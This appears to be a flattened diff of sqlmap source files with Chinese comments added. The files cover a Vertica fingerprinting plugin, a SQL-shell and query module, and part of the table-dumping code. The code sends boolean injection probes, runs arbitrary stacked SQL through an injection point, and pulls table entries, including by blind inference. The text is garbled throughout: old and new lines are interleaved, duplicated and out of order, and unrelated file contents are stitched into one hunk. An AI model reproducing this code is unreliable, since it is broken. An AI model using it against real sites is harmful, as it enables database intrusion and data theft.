htmlErrorFp = Format.getErrorParsedDBMSes() htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
return value return value # 返回指纹信息
# 定义 checkDbms 方法,用于检查数据库类型是否为 Vertica
def checkDbms(self): def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
setDbms(DBMS.VERTICA) setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
self.getBanner() return True # 返回 True
return True
infoMsg = "testing %s" % DBMS.VERTICA infoMsg = "testing %s" % DBMS.VERTICA # 输出正在测试 Vertica 的信息
logger.info(infoMsg) logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO() # NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") # 使用 SQL 注入检查
if result: if result: # 如果检查结果为 True
infoMsg = "confirming %s" % DBMS.VERTICA infoMsg = "confirming %s" % DBMS.VERTICA # 输出确认是 Vertica 的信息
logger.info(infoMsg) logger.info(infoMsg)
result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") # 使用 SQL 注入检查
if not result: if not result: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.warning(warnMsg) logger.warning(warnMsg)
return False # 返回 False
return False setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
self.getBanner() # 获取数据库 banner 信息
setDbms(DBMS.VERTICA) if not conf.extensiveFp: # 如果不需要详细指纹信息
return True # 返回 True
self.getBanner() infoMsg = "actively fingerprinting %s" % DBMS.VERTICA # 输出正在进行详细指纹识别的信息
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.VERTICA
logger.info(infoMsg) logger.info(infoMsg)
# 根据 CALENDAR_HIERARCHY_DAY(NULL) 的结果判断 Vertica 版本
if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"): if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"):
Backend.setVersion(">= 9.0") Backend.setVersion(">= 9.0") # 设置数据库版本为 >= 9.0
else: else:
Backend.setVersion("< 9.0") Backend.setVersion("< 9.0") # 设置数据库版本为 < 9.0
return True return True # 返回 True
else: else: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.warning(warnMsg) logger.warning(warnMsg)
return False # 返回 False
return False

@ -5,146 +5,107 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from __future__ import print_function # 导入必要的模块
from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
import re from lib.core.common import Format # 导入 Format 类,用于格式化输出信息
import sys from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.common import Backend from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.common import dataToStdout from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.common import getSQLSnippet from lib.core.session import setDbms # 导入 setDbms 函数,用于设置数据库类型
from lib.core.common import isStackingAvailable from lib.core.settings import VERTICA_ALIASES # 导入 VERTICA_ALIASES 常量,定义 Vertica 数据库的别名
from lib.core.convert import getUnicode from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from lib.core.data import conf from plugins.generic.fingerprint import Fingerprint as GenericFingerprint # 导入 GenericFingerprint 类,作为当前类的父类
from lib.core.data import logger
from lib.core.dicts import SQL_STATEMENTS # 定义 Fingerprint 类,继承自 GenericFingerprint
from lib.core.enums import AUTOCOMPLETE_TYPE class Fingerprint(GenericFingerprint):
from lib.core.enums import DBMS # 初始化 Fingerprint 类,设置数据库类型为 Vertica
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.shell import autoCompletion
from lib.request import inject
from thirdparty.six.moves import input as _input
class Custom(object):
"""
This class defines custom enumeration functionalities for plugins.
"""
def __init__(self): def __init__(self):
pass GenericFingerprint.__init__(self, DBMS.VERTICA)
def sqlQuery(self, query):
output = None
sqlType = None
query = query.rstrip(';')
try: # 定义 getFingerprint 方法,用于获取数据库指纹信息
for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): def getFingerprint(self):
for sqlStatement in sqlStatements: value = "" # 初始化指纹信息字符串
if query.lower().startswith(sqlStatement): wsOsFp = Format.getOs("web server", kb.headersFp) # 获取 Web 服务器操作系统信息
sqlType = sqlTitle
break
if not re.search(r"\b(OPENROWSET|INTO)\b", query, re.I) and (not sqlType or "SELECT" in sqlType): if wsOsFp:
infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) value += "%s\
logger.info(infoMsg) " % wsOsFp # 将 Web 服务器操作系统信息添加到指纹信息
if Backend.isDbms(DBMS.MSSQL): if kb.data.banner: # 如果存在数据库 banner 信息
match = re.search(r"(\bFROM\s+)([^\s]+)", query, re.I) dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) # 获取数据库操作系统信息
if match and match.group(2).count('.') == 1:
query = query.replace(match.group(0), "%s%s" % (match.group(1), match.group(2).replace('.', ".dbo.")))
query = re.sub(r"(?i)\w+%s\.?" % METADB_SUFFIX, "", query) if dbmsOsFp:
value += "%s\
" % dbmsOsFp # 将数据库操作系统信息添加到指纹信息
output = inject.getValue(query, fromUser=True) value += "back-end DBMS: " # 添加数据库类型标签
return output if not conf.extensiveFp: # 如果不需要详细指纹信息
elif not isStackingAvailable() and not conf.direct: value += DBMS.VERTICA # 将数据库类型添加到指纹信息
warnMsg = "execution of non-query SQL statements is only " return value # 返回指纹信息
warnMsg += "available when stacked queries are supported"
logger.warning(warnMsg)
return None actVer = Format.getDbms() # 获取数据库类型
else: blank = " " * 15 # 定义缩进空格
if sqlType: value += "active fingerprint: %s" % actVer # 添加当前指纹信息
infoMsg = "executing %s statement: '%s'" % (sqlType if sqlType is not None else "SQL", query)
else:
infoMsg = "executing unknown SQL command: '%s'" % query
logger.info(infoMsg)
inject.goStacked(query) if kb.bannerFp: # 如果存在数据库 banner 信息
banVer = kb.bannerFp.get("dbmsVersion") # 获取数据库版本信息
output = NULL if banVer:
banVer = Format.getDbms([banVer]) # 格式化数据库版本信息
value += "\
%sbanner parsing fingerprint: %s" % (blank, banVer) # 将 banner 版本信息添加到指纹信息
except SqlmapNoneDataException as ex: htmlErrorFp = Format.getErrorParsedDBMSes() # 获取 HTML 错误信息中的数据库信息
logger.warning(ex)
return output
def sqlShell(self):
infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(AUTOCOMPLETE_TYPE.SQL) if htmlErrorFp:
value += "\
%shtml error message fingerprint: %s" % (blank, htmlErrorFp) # 将 HTML 错误信息中的数据库信息添加到指纹信息
while True: return value # 返回指纹信息
query = None
try: # 定义 checkDbms 方法,用于检查数据库类型是否为 Vertica
query = _input("sql-shell> ") def checkDbms(self):
query = getUnicode(query, encoding=sys.stdin.encoding) if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): # 如果不需要详细指纹并且数据库别名匹配
query = query.strip("; ") setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
except UnicodeDecodeError: self.getBanner() # 获取数据库 banner 信息
print() return True # 返回 True
errMsg = "invalid user input"
logger.error(errMsg)
except KeyboardInterrupt:
print()
errMsg = "user aborted"
logger.error(errMsg)
except EOFError:
print()
errMsg = "exit"
logger.error(errMsg)
break
if not query: infoMsg = "testing %s" % DBMS.VERTICA # 输出正在测试 Vertica 的信息
continue logger.info(infoMsg)
if query.lower() in ("x", "q", "exit", "quit"):
break
output = self.sqlQuery(query)
if output and output != "Quit": # NOTE: Vertica works too without the CONVERT_TO()
conf.dumper.sqlQuery(query, output) result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") # 使用 SQL 注入检查
elif not output: if result: # 如果检查结果为 True
pass infoMsg = "confirming %s" % DBMS.VERTICA # 输出确认是 Vertica 的信息
logger.info(infoMsg)
elif output != "Quit": result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") # 使用 SQL 注入检查
dataToStdout("No output\n")
def sqlFile(self): if not result: # 如果检查结果为 False
infoMsg = "executing SQL statements from given file(s)" warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.info(infoMsg) logger.warning(warnMsg)
return False # 返回 False
for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): setDbms(DBMS.VERTICA) # 设置数据库类型为 Vertica
filename = filename.strip() self.getBanner() # 获取数据库 banner 信息
if not filename: if not conf.extensiveFp: # 如果不需要详细指纹信息
continue return True # 返回 True
snippet = getSQLSnippet(Backend.getDbms(), filename) infoMsg = "actively fingerprinting %s" % DBMS.VERTICA # 输出正在进行详细指纹识别的信息
logger.info(infoMsg)
if snippet and all(query.strip().upper().startswith("SELECT") for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _)): # 根据 CALENDAR_HIERARCHY_DAY(NULL) 的结果判断 Vertica 版本
for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _): if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"):
query = query.strip() Backend.setVersion(">= 9.0") # 设置数据库版本为 >= 9.0
if query:
conf.dumper.sqlQuery(query, self.sqlQuery(query))
else: else:
conf.dumper.sqlQuery(snippet, self.sqlQuery(snippet)) Backend.setVersion("< 9.0") # 设置数据库版本为 < 9.0
return True # 返回 True
else: # 如果检查结果为 False
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA # 输出警告信息
logger.warning(warnMsg)
return False # 返回 False

File diff suppressed because it is too large Load Diff

@ -5,10 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
# 导入正则表达式模块
import re import re
# 从lib.core.agent模块导入agent对象用于处理注入过程中的各种细节
from lib.core.agent import agent from lib.core.agent import agent
# 从lib.core.bigarray模块导入BigArray类用于高效存储和处理大量数据
from lib.core.bigarray import BigArray from lib.core.bigarray import BigArray
# 从lib.core.common模块导入各种常用函数和常量如Backend、clearConsoleLine、getLimitRange等
from lib.core.common import Backend from lib.core.common import Backend
from lib.core.common import clearConsoleLine from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange from lib.core.common import getLimitRange
@ -25,33 +29,47 @@ from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage
from lib.core.common import unArrayizeValue from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming
# 从lib.core.convert模块导入getConsoleLength函数用于获取控制台字符串的长度
from lib.core.convert import getConsoleLength from lib.core.convert import getConsoleLength
from lib.core.convert import getUnicode from lib.core.convert import getUnicode
# 从lib.core.data模块导入conf和kb对象用于存储配置信息和知识库信息
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
# 从lib.core.data模块导入logger对象用于记录日志信息
from lib.core.data import logger from lib.core.data import logger
# 从lib.core.data模块导入queries对象用于存储各种数据库的查询语句
from lib.core.data import queries from lib.core.data import queries
# 从lib.core.dicts模块导入DUMP_REPLACEMENTS字典用于替换转储数据中的特殊字符
from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.dicts import DUMP_REPLACEMENTS
# 从lib.core.enums模块导入各种枚举类型如CHARSET_TYPE、DBMS、EXPECTED、PAYLOAD等
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
# 从lib.core.exception模块导入各种自定义异常类
from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
# 从lib.core.settings模块导入各种配置常量
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX from lib.core.settings import METADB_SUFFIX
from lib.core.settings import NULL from lib.core.settings import NULL
from lib.core.settings import PLUS_ONE_DBMSES from lib.core.settings import PLUS_ONE_DBMSES
from lib.core.settings import UPPER_CASE_DBMSES from lib.core.settings import UPPER_CASE_DBMSES
# 从lib.request模块导入inject函数用于执行SQL注入
from lib.request import inject from lib.request import inject
# 从lib.utils.hash模块导入attackDumpedTable函数用于对转储的表数据进行攻击
from lib.utils.hash import attackDumpedTable from lib.utils.hash import attackDumpedTable
# 从lib.utils.pivotdumptable模块导入pivotDumpTable函数用于执行透视转储表操作
from lib.utils.pivotdumptable import pivotDumpTable from lib.utils.pivotdumptable import pivotDumpTable
# 导入第三方six库用于兼容Python 2和Python 3
from thirdparty import six from thirdparty import six
# 导入第三方six库的zip函数并重命名为_zip
from thirdparty.six.moves import zip as _zip from thirdparty.six.moves import zip as _zip
# 定义Entries类用于封装枚举数据库条目的相关功能
class Entries(object): class Entries(object):
""" """
This class defines entries' enumeration functionalities for plugins. This class defines entries' enumeration functionalities for plugins.
@ -60,9 +78,12 @@ class Entries(object):
def __init__(self): def __init__(self):
pass pass
# 定义dumpTable方法用于转储指定表的条目
def dumpTable(self, foundData=None): def dumpTable(self, foundData=None):
# 强制执行数据库枚举,确保已获取数据库类型
self.forceDbmsEnum() self.forceDbmsEnum()
# 如果没有指定数据库或指定为当前数据库,则获取当前数据库
if conf.db is None or conf.db == CURRENT_DB: if conf.db is None or conf.db == CURRENT_DB:
if conf.db is None: if conf.db is None:
warnMsg = "missing database parameter. sqlmap is going " warnMsg = "missing database parameter. sqlmap is going "
@ -71,65 +92,81 @@ class Entries(object):
logger.warning(warnMsg) logger.warning(warnMsg)
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
# 如果指定了数据库
elif conf.db is not None: elif conf.db is not None:
# 如果数据库是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.db = conf.db.upper() conf.db = conf.db.upper()
# 如果数据库名包含逗号,则抛出异常,因为只允许一个数据库名
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
# 如果数据库名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None:
infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
return return
# 对数据库名进行安全处理
conf.db = safeSQLIdentificatorNaming(conf.db) or "" conf.db = safeSQLIdentificatorNaming(conf.db) or ""
# 如果指定了表
if conf.tbl: if conf.tbl:
# 如果表名是属于大写数据库类型,则将其转换为大写
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
conf.tbl = conf.tbl.upper() conf.tbl = conf.tbl.upper()
# 将表名拆分为列表
tblList = conf.tbl.split(',') tblList = conf.tbl.split(',')
# 如果没有指定表
else: else:
# 获取所有表
self.getTables() self.getTables()
# 如果已缓存表信息
if len(kb.data.cachedTables) > 0: if len(kb.data.cachedTables) > 0:
# 获取表列表
tblList = list(six.itervalues(kb.data.cachedTables)) tblList = list(six.itervalues(kb.data.cachedTables))
# 如果表列表嵌套,则解包
if tblList and isListLike(tblList[0]): if tblList and isListLike(tblList[0]):
tblList = tblList[0] tblList = tblList[0]
# 如果指定了数据库但未能获取表信息
elif conf.db and not conf.search: elif conf.db and not conf.search:
errMsg = "unable to retrieve the tables " errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
else: else:
return return
# 对表名列表中的表名进行安全处理
for tbl in tblList: for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
# 遍历表列表
for tbl in tblList: for tbl in tblList:
# 如果检测到键盘中断,则跳出循环
if kb.dumpKeyboardInterrupt: if kb.dumpKeyboardInterrupt:
break break
# 如果表名匹配排除模式,则跳过
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None: if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
singleTimeLogMessage(infoMsg) singleTimeLogMessage(infoMsg)
continue continue
# 设置当前表名
conf.tbl = tbl conf.tbl = tbl
# 初始化已转储的表数据
kb.data.dumpedTable = {} kb.data.dumpedTable = {}
# 如果没有传入已发现的列数据
if foundData is None: if foundData is None:
# 清空缓存的列信息
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
# 获取列信息,仅获取列名,并设置转储模式
self.getColumns(onlyColNames=True, dumpMode=True) self.getColumns(onlyColNames=True, dumpMode=True)
# 如果传入了已发现的列数据,则直接使用
else: else:
kb.data.cachedColumns = foundData kb.data.cachedColumns = foundData
try: try:
# 根据数据库类型设置转储表名
if Backend.isDbms(DBMS.INFORMIX): if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl) kb.dumpTable = "%s:%s" % (conf.db, tbl)
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
@ -139,6 +176,7 @@ class Entries(object):
else: else:
kb.dumpTable = "%s.%s" % (conf.db, tbl) kb.dumpTable = "%s.%s" % (conf.db, tbl)
# 如果未能获取列信息,则跳过当前表
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper(): if METADB_SUFFIX.upper() not in conf.db.upper():
@ -148,12 +186,16 @@ class Entries(object):
continue continue
# 获取当前表的列信息
columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]
# 对列名列表进行排序
colList = sorted(column for column in columns if column) colList = sorted(column for column in columns if column)
# 如果指定了排除模式,则从列名列表中排除匹配的列
if conf.exclude: if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
# 如果没有可用的列名,则跳过当前表
if not colList: if not colList:
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX.upper() not in conf.db.upper(): if METADB_SUFFIX.upper() not in conf.db.upper():
@ -161,9 +203,11 @@ class Entries(object):
warnMsg += " (no usable column names)" warnMsg += " (no usable column names)"
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
# 设置全局变量 kb.dumpColumns 为当前表需要转储的列名列表
kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList] kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList]
# 将列名列表转换为逗号分隔的字符串
colNames = colString = ','.join(column for column in colList) colNames = colString = ','.join(column for column in colList)
# 获取转储表的根查询
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
infoMsg = "fetching entries" infoMsg = "fetching entries"
@ -174,17 +218,21 @@ class Entries(object):
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
# 遍历列名列表,对每个列名进行预处理
for column in colList: for column in colList:
_ = agent.preprocessField(tbl, column) _ = agent.preprocessField(tbl, column)
if _ != column: if _ != column:
colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString) colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString)
# 初始化条目计数
entriesCount = 0 entriesCount = 0
# 如果存在可用的注入技术,或使用了--direct参数
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 初始化条目列表
entries = [] entries = []
query = None query = None
# 根据数据库类型构建查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -247,9 +295,10 @@ class Entries(object):
query = rootQuery.inband.query % (colString, conf.db, tbl) query = rootQuery.inband.query % (colString, conf.db, tbl)
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 如果没有获取到条目,并且查询语句存在,并且没有检测到键盘中断
if not entries and query and not kb.dumpKeyboardInterrupt: if not entries and query and not kb.dumpKeyboardInterrupt:
try: try:
# 执行查询语句,获取条目信息
entries = inject.getValue(query, blind=False, time=False, dump=True) entries = inject.getValue(query, blind=False, time=False, dump=True)
except KeyboardInterrupt: except KeyboardInterrupt:
entries = None entries = None
@ -257,7 +306,7 @@ class Entries(object):
clearConsoleLine() clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase" warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg) logger.warning(warnMsg)
# 如果成功获取到条目
if not isNoneValue(entries): if not isNoneValue(entries):
if isinstance(entries, six.string_types): if isinstance(entries, six.string_types):
entries = [entries] entries = [entries]
@ -266,6 +315,7 @@ class Entries(object):
entriesCount = len(entries) entriesCount = len(entries)
# 遍历每个列名和条目,更新转储的表数据信息
for index, column in enumerate(colList): for index, column in enumerate(colList):
if column not in kb.data.dumpedTable: if column not in kb.data.dumpedTable:
kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()}
@ -273,19 +323,20 @@ class Entries(object):
for entry in entries: for entry in entries:
if entry is None or len(entry) == 0: if entry is None or len(entry) == 0:
continue continue
# 如果条目是字符串类型
if isinstance(entry, six.string_types): if isinstance(entry, six.string_types):
colEntry = entry colEntry = entry
# 否则,获取指定索引的条目
else: else:
colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''
maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))
# 更新最大长度
if maxLen > kb.data.dumpedTable[column]["length"]: if maxLen > kb.data.dumpedTable[column]["length"]:
kb.data.dumpedTable[column]["length"] = maxLen kb.data.dumpedTable[column]["length"] = maxLen
# 添加条目值
kb.data.dumpedTable[column]["values"].append(colEntry) kb.data.dumpedTable[column]["values"].append(colEntry)
# 如果没有转储表数据,并且可以使用盲注方式,且不是直接模式
if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of " infoMsg = "fetching number of "
if conf.col: if conf.col:
@ -294,6 +345,7 @@ class Entries(object):
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)
# 构建盲注获取条目计数的查询语句
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
@ -307,21 +359,22 @@ class Entries(object):
query = agent.whereQuery(query) query = agent.whereQuery(query)
# 执行盲注查询,获取条目计数
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
lengths = {} lengths = {}
entries = {} entries = {}
# 如果条目计数为0
if count == 0: if count == 0:
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
warnMsg += "appears to be empty" warnMsg += "appears to be empty"
logger.warning(warnMsg) logger.warning(warnMsg)
# 初始化长度和条目
for column in colList: for column in colList:
lengths[column] = len(column) lengths[column] = len(column)
entries[column] = [] entries[column] = []
# 如果未能获取条目计数
elif not isNumPosStrValue(count): elif not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of " warnMsg = "unable to retrieve the number of "
if conf.col: if conf.col:
@ -331,7 +384,7 @@ class Entries(object):
logger.warning(warnMsg) logger.warning(warnMsg)
continue continue
# 对于特定数据库
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA): elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA):
